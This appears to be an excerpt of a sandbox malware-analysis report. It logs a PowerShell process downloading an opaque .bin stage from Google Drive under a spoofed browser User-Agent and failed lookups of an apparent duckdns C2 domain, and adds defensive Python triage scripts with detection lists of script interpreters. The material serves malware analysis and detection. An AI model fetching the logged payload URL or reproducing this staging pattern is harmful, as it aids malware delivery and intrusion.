Sep 2, 2024 16:20:44.855431080 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.855890036 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.855956078 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.855962038 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.856008053 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.861237049 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.861321926 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.861350060 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.861397982 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.862076998 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.862118959 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.862128973 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.862139940 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.862155914 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.862189054 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.862915993 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.862967014 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.863575935 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.863625050 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.863631010 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.863672018 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.863976002 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.864018917 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.864023924 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.864064932 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.864912987 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.864969969 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.865009069 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.865051031 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.868716955 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.868797064 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.868972063 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.869083881 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.869252920 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.869302034 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.869307995 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.869348049 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.869755030 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.869800091 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.869807005 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.869846106 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.872057915 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.872107029 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.872113943 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.872154951 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.872812033 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.872864008 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.872869968 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.872914076 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.873650074 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.873697042 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.878849030 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.878906012 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.878954887 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.878995895 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.879002094 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.879044056 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.879682064 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.879724979 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.879729986 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.879745007 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.879772902 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.879815102 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.903315067 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.903438091 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.903486013 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.903559923 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.903805971 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.903850079 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.903858900 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.903902054 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.904316902 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.904361010 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.904367924 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.904405117 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.905311108 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.905360937 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.905360937 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.905379057 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.905405998 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.905445099 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.905450106 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.905492067 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.905527115 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Sep 2, 2024 16:20:44.905570984 CEST | 443 | 49729 | 142.250.181.225 | 192.168.2.7
Sep 2, 2024 16:20:44.905668974 CEST | 49729 | 443 | 192.168.2.7 | 142.250.181.225
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 2, 2024 16:20:40.096498013 CEST | 61715 | 53 | 192.168.2.7 | 1.1.1.1
Sep 2, 2024 16:20:40.103375912 CEST | 53 | 61715 | 1.1.1.1 | 192.168.2.7
Sep 2, 2024 16:20:41.197871923 CEST | 50040 | 53 | 192.168.2.7 | 1.1.1.1
Sep 2, 2024 16:20:41.205425024 CEST | 53 | 50040 | 1.1.1.1 | 192.168.2.7
Sep 2, 2024 16:20:46.458014011 CEST | 61093 | 53 | 192.168.2.7 | 1.1.1.1
Sep 2, 2024 16:20:47.461338043 CEST | 61093 | 53 | 192.168.2.7 | 1.1.1.1
Sep 2, 2024 16:20:48.471894026 CEST | 61093 | 53 | 192.168.2.7 | 1.1.1.1
Sep 2, 2024 16:20:50.488946915 CEST | 61093 | 53 | 192.168.2.7 | 1.1.1.1
Sep 2, 2024 16:20:52.272173882 CEST | 53 | 61093 | 1.1.1.1 | 192.168.2.7
Sep 2, 2024 16:20:52.272193909 CEST | 53 | 61093 | 1.1.1.1 | 192.168.2.7
Sep 2, 2024 16:20:52.272203922 CEST | 53 | 61093 | 1.1.1.1 | 192.168.2.7
Sep 2, 2024 16:20:52.272213936 CEST | 53 | 61093 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 2, 2024 16:20:40.096498013 CEST | 192.168.2.7 | 1.1.1.1 | 0x4694 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:41.197871923 CEST | 192.168.2.7 | 1.1.1.1 | 0x9d7f | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:46.458014011 CEST | 192.168.2.7 | 1.1.1.1 | 0x64bb | Standard query (0) | a458386d9.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:47.461338043 CEST | 192.168.2.7 | 1.1.1.1 | 0x64bb | Standard query (0) | a458386d9.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:48.471894026 CEST | 192.168.2.7 | 1.1.1.1 | 0x64bb | Standard query (0) | a458386d9.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:50.488946915 CEST | 192.168.2.7 | 1.1.1.1 | 0x64bb | Standard query (0) | a458386d9.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 2, 2024 16:20:40.103375912 CEST | 1.1.1.1 | 192.168.2.7 | 0x4694 | No error (0) | drive.google.com | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:41.205425024 CEST | 1.1.1.1 | 192.168.2.7 | 0x9d7f | No error (0) | drive.usercontent.google.com | | 142.250.181.225 | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:52.272173882 CEST | 1.1.1.1 | 192.168.2.7 | 0x64bb | Server failure (2) | a458386d9.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:52.272193909 CEST | 1.1.1.1 | 192.168.2.7 | 0x64bb | Server failure (2) | a458386d9.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:52.272203922 CEST | 1.1.1.1 | 192.168.2.7 | 0x64bb | Server failure (2) | a458386d9.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Sep 2, 2024 16:20:52.272213936 CEST | 1.1.1.1 | 192.168.2.7 | 0x64bb | Server failure (2) | a458386d9.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
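The DNS tables above carry the one network indicator that survives the sandbox run: the sample resolved its two Google Drive hosts normally, then queried a458386d9.duckdns.org (a dynamic-DNS name, matching the "Uses dynamic DNS services" signature) four times with the same transaction ID 0x64bb and received only SERVFAIL, so no C2 address ever appears in the capture. The script below is an added example, not part of the Joe Sandbox report; it rebuilds the query/answer rows as constructed tuples (timestamps trimmed to microseconds) and flags names that use a dynamic-DNS provider, were retransmitted, or never resolved. DYNAMIC_DNS_SUFFIXES is an assumption of this example.

```python
"""Pull C2 resolution attempts out of sandbox-style DNS query/answer rows.

Added example; not part of the Joe Sandbox report. Sample rows are constructed
from the report's DNS tables. DYNAMIC_DNS_SUFFIXES is an assumption.
"""
from collections import defaultdict
from datetime import datetime

# Assumption: dynamic-DNS providers commonly used by commodity RATs for C2.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org",
                        "zapto.org", "dynu.com", "freedns.afraid.org")

# Constructed sample: (time of day, transaction id, queried name)
QUERIES = [
    ("16:20:40.096498", "0x4694", "drive.google.com"),
    ("16:20:41.197871", "0x9d7f", "drive.usercontent.google.com"),
    ("16:20:46.458014", "0x64bb", "a458386d9.duckdns.org"),
    ("16:20:47.461338", "0x64bb", "a458386d9.duckdns.org"),
    ("16:20:48.471894", "0x64bb", "a458386d9.duckdns.org"),
    ("16:20:50.488946", "0x64bb", "a458386d9.duckdns.org"),
]
# Constructed sample: (time of day, transaction id, reply code, name, address)
ANSWERS = [
    ("16:20:40.103375", "0x4694", "No error (0)", "drive.google.com", "142.250.184.238"),
    ("16:20:41.205425", "0x9d7f", "No error (0)", "drive.usercontent.google.com", "142.250.181.225"),
    ("16:20:52.272173", "0x64bb", "Server failure (2)", "a458386d9.duckdns.org", "none"),
    ("16:20:52.272193", "0x64bb", "Server failure (2)", "a458386d9.duckdns.org", "none"),
    ("16:20:52.272203", "0x64bb", "Server failure (2)", "a458386d9.duckdns.org", "none"),
    ("16:20:52.272213", "0x64bb", "Server failure (2)", "a458386d9.duckdns.org", "none"),
]


def is_dynamic_dns(name):
    """True when the name is, or sits under, a known dynamic-DNS zone."""
    n = name.lower().rstrip(".")
    return any(n == s or n.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


def to_seconds(ts):
    """Seconds since midnight for an HH:MM:SS.ffffff time-of-day string."""
    t = datetime.strptime(ts, "%H:%M:%S.%f")
    return t.hour * 3600 + t.minute * 60 + t.second + t.microsecond / 1e6


def analyze(queries=QUERIES, answers=ANSWERS):
    """Group by (transaction id, name) and return one finding per flagged name."""
    q_by_key, a_by_key = defaultdict(list), defaultdict(list)
    for ts, txid, name in queries:
        q_by_key[(txid, name.lower())].append(ts)
    for ts, txid, rcode, name, addr in answers:
        a_by_key[(txid, name.lower())].append((rcode, addr))

    findings = []
    for (txid, name), stamps in q_by_key.items():
        reasons = []
        if is_dynamic_dns(name):
            reasons.append("dynamic-DNS provider")
        # The same transaction ID on repeated queries is stub-resolver
        # retransmission: one lookup, not N beacons, so count it once.
        if len(stamps) > 1:
            gaps = [round(to_seconds(b) - to_seconds(a), 1)
                    for a, b in zip(stamps, stamps[1:])]
            reasons.append(f"{len(stamps)} retransmissions, gaps {gaps}s")
        rcodes = {rc for rc, _ in a_by_key[(txid, name)]}
        addrs = sorted({ad for _, ad in a_by_key[(txid, name)] if ad != "none"})
        if rcodes and all(rc.startswith(("Server failure", "Non-existent"))
                          for rc in rcodes):
            reasons.append("resolution failed: " + ", ".join(sorted(rcodes)))
        if reasons:
            findings.append({"name": name, "txid": txid, "attempts": len(stamps),
                             "resolved_to": addrs, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze():
        print(f"{f['name']} (txid {f['txid']}, {f['attempts']} queries) -> "
              f"{f['resolved_to'] or 'unresolved'}: {'; '.join(f['reasons'])}")
```

Two caveats follow from the output. A SERVFAIL in the sandbox does not mean the C2 is down: the duckdns record may simply have been removed or rate-limited by the time the sample was detonated, so the domain is still worth blocking. And the 1 s, 1 s, 2 s spacing is the Windows DNS client's retransmit schedule, not a beacon interval; anyone counting "four C2 attempts" from the raw query table would be overstating it.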
                                    • drive.google.com
                                    • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49726 | 142.250.184.238 | 443 | 7800 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-02 14:20:40 UTC | 216 | OUT | GET /uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: drive.google.com
                                    Cache-Control: no-cache
2024-09-02 14:20:41 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Mon, 02 Sep 2024 14:20:41 GMT
                                    Location: https://drive.usercontent.google.com/download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download
                                    Strict-Transport-Security: max-age=31536000
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Cross-Origin-Opener-Policy: same-origin
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Content-Security-Policy: script-src 'nonce-DMN4-Su6hVZyZ_GLk_pZGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


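The two HTTP sessions in this report tell the staging story on their own: powershell.exe (PID 7800) requests a Google Drive object while presenting a Firefox User-Agent, drive.google.com answers 303 with a Location on drive.usercontent.google.com for the same object id, and the second session returns a 494656-byte application/octet-stream attachment named WdxiRcGrvsVlRYCbtLvre252.bin. The script below is an added example, not code from the Joe Sandbox report; it reconstructs both message heads from the values printed on the page (headers the checks do not need are omitted), parses them, follows the redirect, and reports the process/User-Agent mismatch and the opaque download. SCRIPT_HOSTS, FILE_SHARING_HOSTS, BROWSER_UA_MARKERS and the innocuous-extension list are assumptions of this example.

```python
"""Triage sandbox HTTP sessions: a script interpreter pulling an opaque blob
from a file-sharing service under a browser User-Agent, across a redirect.

Added example; not part of the Joe Sandbox report. Sessions are constructed
from the report's headers. The lists below are assumptions of this example.
"""
from urllib.parse import parse_qs, urlsplit

# Assumption: script interpreters that should not be fetching downloads.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}
# Assumption: services routinely abused to host encrypted second stages.
FILE_SHARING_HOSTS = ("drive.google.com", "drive.usercontent.google.com",
                      "dropbox.com", "onedrive.live.com", "mega.nz")
BROWSER_UA_MARKERS = ("Firefox/", "Chrome/", "Safari/", "Edg/")
PAYLOAD_TYPES = ("application/octet-stream", "application/binary")
# Assumption: extensions under which encrypted stage-2 blobs are often served.
OPAQUE_EXTENSIONS = (".bin", ".dat", ".txt", ".jpg", ".png")

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) "
      "Gecko/20100101 Firefox/121.0")
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
FILE_ID = "12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I"

# Constructed sample: one (process, request head, response head) per session.
SESSIONS = [
    (PS,
     f"GET /uc?export=download&id={FILE_ID} HTTP/1.1\r\n"
     f"User-Agent: {UA}\r\nHost: drive.google.com\r\n\r\n",
     "HTTP/1.1 303 See Other\r\nContent-Type: application/binary\r\n"
     "Location: https://drive.usercontent.google.com/download"
     f"?id={FILE_ID}&export=download\r\nContent-Length: 0\r\n\r\n"),
    (PS,
     f"GET /download?id={FILE_ID}&export=download HTTP/1.1\r\n"
     f"User-Agent: {UA}\r\nHost: drive.usercontent.google.com\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
     'Content-Disposition: attachment; filename="WdxiRcGrvsVlRYCbtLvre252.bin"\r\n'
     "Content-Length: 494656\r\n\r\n"),
]


def parse_head(raw):
    """Split a raw HTTP message head into its start line and a header dict."""
    lines = raw.strip("\r\n").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def triage_session(process, request, response):
    """Return a finding dict for one session; 'reasons' is empty when benign."""
    req_line, req = parse_head(request)
    status_line, resp = parse_head(response)
    path = req_line.split(" ")[1]
    status = int(status_line.split(" ")[1])
    exe = process.rsplit("\\", 1)[-1].lower()
    host, ua = req.get("host", ""), req.get("user-agent", "")
    finding = {"process": exe, "host": host, "status": status,
               "file_id": parse_qs(urlsplit(path).query).get("id", [""])[0],
               "next_hop": None, "download": None, "reasons": []}

    if exe in SCRIPT_HOSTS and any(m in ua for m in BROWSER_UA_MARKERS):
        finding["reasons"].append(f"{exe} presents a browser User-Agent")
    if exe in SCRIPT_HOSTS and host.endswith(FILE_SHARING_HOSTS):
        finding["reasons"].append(f"{exe} fetches from file-sharing host {host}")

    if status in (301, 302, 303, 307, 308) and "location" in resp:
        loc = urlsplit(resp["location"])
        finding["next_hop"] = loc.hostname
        # The same object id on both sides proves this is one download, not two.
        if parse_qs(loc.query).get("id", [""])[0] == finding["file_id"]:
            finding["reasons"].append(f"redirected to {loc.hostname} for the same object")

    ctype = resp.get("content-type", "").split(";")[0]
    if status == 200 and ctype in PAYLOAD_TYPES:
        disp = resp.get("content-disposition", "")
        name = disp.split('filename="')[-1].rstrip('"') if "filename=" in disp else ""
        size = int(resp.get("content-length", "0"))
        finding["download"] = {"filename": name, "size": size, "content_type": ctype}
        if name.lower().endswith(OPAQUE_EXTENSIONS):
            finding["reasons"].append(f"opaque {size}-byte attachment {name!r}")
    return finding


def triage(sessions=SESSIONS):
    return [triage_session(*s) for s in sessions]


if __name__ == "__main__":
    for f in triage():
        print(f["process"], f["host"], f["status"], "|", "; ".join(f["reasons"]))
```

The redirect matters for response: blocking only the first host seen in proxy logs misses the host that actually served the payload, so both drive.google.com and drive.usercontent.google.com belong in the timeline, keyed on the shared object id. Note also that the 303 response carries Content-Type: application/binary with Content-Length: 0, so a rule that fires on "binary content type" alone would mis-attribute the download to the wrong session; the size and Content-Disposition live on the 200.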
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49729 | 142.250.181.225 | 443 | 7800 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-02 14:20:41 UTC | 258 | OUT | GET /download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Cache-Control: no-cache
                                    Host: drive.usercontent.google.com
                                    Connection: Keep-Alive
2024-09-02 14:20:44 UTC | 4860 | IN | HTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Content-Security-Policy: sandbox
                                    Content-Security-Policy: default-src 'none'
                                    Content-Security-Policy: frame-ancestors 'none'
                                    X-Content-Security-Policy: sandbox
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Resource-Policy: same-site
                                    X-Content-Type-Options: nosniff
                                    Content-Disposition: attachment; filename="WdxiRcGrvsVlRYCbtLvre252.bin"
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: false
                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                    Accept-Ranges: bytes
                                    Content-Length: 494656
                                    Last-Modified: Fri, 05 Jul 2024 08:47:24 GMT
                                    X-GUploader-UploadID: AD-8ljtQZaeEmVLw_wEuNZaVS2UHGs5lgIIKGgdkSc4ZdguIXR47wUvdLZVPB9BTsE8pP8kX0A
                                    Date: Mon, 02 Sep 2024 14:20:44 GMT
                                    Expires: Mon, 02 Sep 2024 14:20:44 GMT
                                    Cache-Control: private, max-age=0
                                    X-Goog-Hash: crc32c=kmxt9A==
                                    Server: UploadServer
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close
2024-09-02 14:20:44 UTC | 4860 | IN | Data Raw: 17 06 a8 47 2b db e2 27 21 a6 f2 65 1b 28 40 90 fa 3f 12 90 88 9a 3b 60 3f bb 04 fb b0 1c bd 94 11 2b 1f 41 fd 95 6f 69 b0 fd 86 5c 05 ae f8 09 f1 92 e0 41 77 07 5d 7b 47 a4 a2 46 85 fc cc e9 c2 4c 3b 00 6f 0f 6e ec 3c 8d 3e 66 dd 17 05 70 eb e7 94 a4 ec bf d3 32 0b 27 87 b0 60 dc 96 58 03 e9 6c da 46 48 f5 2e dd 97 74 a2 56 6a e2 7d 02 e5 86 30 eb 7c de 4a 85 90 54 29 2f 3d b2 68 e9 1f c9 a3 72 75 99 8f 8f e1 fb c7 2d 55 41 5f 2a 37 15 cd 99 b7 49 ab 09 43 ef ed d0 b8 0a 09 07 f4 ae 2a cc 61 39 6b 67 14 96 94 2e d3 89 88 d7 7e e9 e9 3e 0f 82 9d e1 31 aa b9 8b 64 dd cb 15 74 e9 b2 72 e9 72 be 72 1e 21 2c 9c 31 cf ae d2 4f e2 f5 0e 00 46 75 60 b7 dd 88 67 f2 2c ae 73 ab 36 6f 1d ec 15 42 a5 c2 ca 6d 72 69 12 16 85 22 0b fc b8 bd e2 56 97 5e 2b 7e 3d 18 e4
                                    Data Ascii: G+'!e(@?;`?+Aoi\Aw]{GFL;on<>fp2'`XlFH.tVj}0|JT)/=hru-UA_*7IC*a9kg.~>1dtrrr!,1OFu`g,s6oBmri"V^+~=
